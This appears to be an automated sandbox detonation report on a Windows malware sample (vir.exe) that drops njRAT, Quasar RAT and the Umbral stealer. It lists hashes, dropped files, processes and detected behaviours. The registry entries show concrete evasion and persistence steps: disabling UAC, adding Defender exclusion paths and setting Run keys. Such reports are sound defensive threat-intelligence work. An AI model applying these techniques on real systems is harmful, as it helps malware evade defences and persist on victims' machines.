SHA512 1df32349b33f6a6fcb1f8b6093abd737fa0638cdd6e3fd90a7e1852bd0e40bc2633cb4e13c4824fb948d1e012e5cb9eed0b038b121404865495d4e57e123db69

memory/912-6255-0x0000000000040000-0x0000000000364000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jD0d0HUugteK.bat

MD5 910feec4f11dbdef969865431e445035
SHA1 e692184390c08c8ab3825e2c29ec9800dafe61bb
SHA256 2e5c1de991e99fe355c2e1b6b3c7cb0af07606c11af1ab367019d6c055e11358
SHA512 9bb0de54a43f5471657febee6fd76a60ed155d5f76db4a81ae2d6604488e2b683e2118015d43441cea104083e887e2f6717d76e8a3b40506a51cf5a481b3a279

C:\Users\Admin\AppData\Local\Temp\EZyhRilaxK4P.bat

MD5 56e53e075c0c239b6e0894b48eb32a00
SHA1 2cd05795364394a3cfdfd6f6cf7ad1b1eddf648f
SHA256 eba4142dd3da2000dda3079fbe02312487becb7a02d4e59be3e52169b7a6ef14
SHA512 55938793e568e118218479abb073008b4aa929f92664e20fde724dd4db7ecaee60b9ea7a4cf1a7873bd1e606b8d8baaa5d51fa1f0958c41086199531a56a26ed

C:\Users\Admin\AppData\Local\Temp\TtFOjjU5RTQ3.bat

MD5 42e1f9853f09310a2c8f4be7169c183c
SHA1 fec36846639a1b09fe2547d6678f95614ff89578
SHA256 55801fa3568aff97a69eaee89e6586960d71a185ba197c521890b4c936fe727e
SHA512 62f54f99621ed8e84448b250d17d0a833dda5e7a85d918496fc974f26625b8c2f40c55ac5fd5eaff83b0f1ee69c8b18dce2bda83ac8517da70674364ef378dca

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 09:16

Reported

2024-11-08 09:21

Platform

win10v2004-20241007-en

Max time kernel

152s

Max time network

166s

Command Line

"C:\Users\Admin\AppData\Local\Temp\vir.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Umbral

stealer umbral

Umbral family

umbral

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

njRAT/Bladabindi

trojan njrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\1CCF8823482A12F66BA7C629093B98DF77300697\Blob = 0f000000010000001400000067b3a708f1576af8c76f850d49fa5b878ffe45310200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000620035003500380035003200380035002d0033003600370063002d0034006100640061002d0061006100330034002d0065006500380033003100630063003800350063003800320000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000300000001000000140000001ccf8823482a12f66ba7c629093b98df77300697200000000100000000030000308202fc308201e4a00302010202104a3bf5362cc6dd834d64c59090733aa6300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313130383039313931375a180f32313234313031353039313931375a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dc52dc355f446ca60a7a9674bd866624422fcd4c120bd1e64155d3853c71d0ec5e3f22e9712e297eea95dec6c30548a420b41f4abe40c3613358f28f5100976d1fa19ccb39dfc708cfb52bf32ce934054f77c28d4d987b34f42af4b8cca59b678585616fd85c36f581bfe79da39d1b9cfdc270fada2e36caf60759b6773445998f78502d375686c673a079c1a5087bcfcaa68df4a6151c031e6b69a19c32ef2048a6943808713297fb82fc01fb662feb31e86afe2c57678baaa513ac573626f01602df40e01aa6014c3b2de7c21fca1ab8634a2742473e4d8153485e018cb5c7a4f06dacd5acb90d18e7bace4ec28d2f96ae1bfa4bc49515c8ca159f6602fb710203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e404b424b574745424b0030090603551d1304023000300d06092a864886f70d0101050500038201010092aba6879b3d92d2d30dd09ab1b7db00532b6f7cbb2202d2a54c53b4475a1dafe10549722049f7838664bd7289bfd04dff25db8bb7e1cf41f7d06816d63cfbc49c665fdd82032a1a7b5587e655571788279445dd9ab9f7d41c5e8e457305b0922e6325002ff63f3fc7c6cba72d81edc18c24b8fab93bedcea73aebc4104ed67a755ef6545aed1d68b971036daa12416ac56dbe2ce608af284fc8a2727dbec248a7cca31648fd9ad8981822bf1364ee139db9dbf3cd5dbb6056d4e995307549a527a26f0b7d305cb9a4ff4d345d3468f6985da3adf6b004adafe743230a7f61e58cbc95586069ae2497d64b89da247cc0814b2d4c2b890e2f761c40cc1a74cf73 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rj4PrEgwxfGsAttY0T428Muw.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Google.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\regmess.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\scary.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wimloader.dll N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\ac3.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\freebobux.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wim.dll N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\CLWCP.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Password Policy Discovery

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp" C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\CLWCP.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 6924 set thread context of 6700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Winaero Tweaker\is-F40AI.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-I6BPG.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-G688I.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-NAHLU.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\SubDir\Romilyaa.exe C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\scary.exe N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_i386.dll C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-4SF88.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-COUAC.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\Winaero Tweaker\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-MK150.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-8KKUE.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-NO9VC.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\SubDir\Romilyaa.exe C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\scary.exe N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_x86_64.dll C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweakerHelper.exe C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\Winaero Tweaker\Elevator.exe C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-D66JH.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroControls.dll C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\regmess.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\notepad.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ipconfig.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cipher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wimloader.dll N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\freebobux.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regedit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cipher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cipher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
